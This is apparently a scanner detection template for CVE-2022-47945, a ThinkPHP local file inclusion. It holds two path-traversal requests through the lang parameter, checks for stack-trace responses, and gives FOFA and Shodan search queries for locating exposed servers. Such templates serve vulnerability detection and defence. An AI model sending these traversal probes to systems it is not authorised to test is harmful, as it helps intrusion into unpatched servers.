id: CVE-2022-47945

info:
  name: Thinkphp Lang - Local File Inclusion
  author: kagamigawa
  severity: critical
  verified: true
  description: |
    ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
    FOFA: header="think_lang"
    SHODAN: title:"Thinkphp"
  reference:
    - https://tttang.com/archive/1865/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-47945
    - https://github.com/top-think/framework/compare/v6.0.13...v6.0.14
    - https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099
  tags: cve,cve2022,thinkphp,lfi
  created: 2023/06/17

rules:
  r0:
    request:
      method: GET
      path: /?lang=../../thinkphp/base
    expression: |
      response.status == 500 &&
      response.body.bcontains(b'Call Stack') &&
      response.body.bcontains(b'class="trace')
  r1:
    request:
      method: GET
      path: /?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug
    expression: |
      response.status == 500 &&
      response.body.bcontains(b'Call Stack') &&
      response.body.bcontains(b'class="trace')
expression: r0() || r1()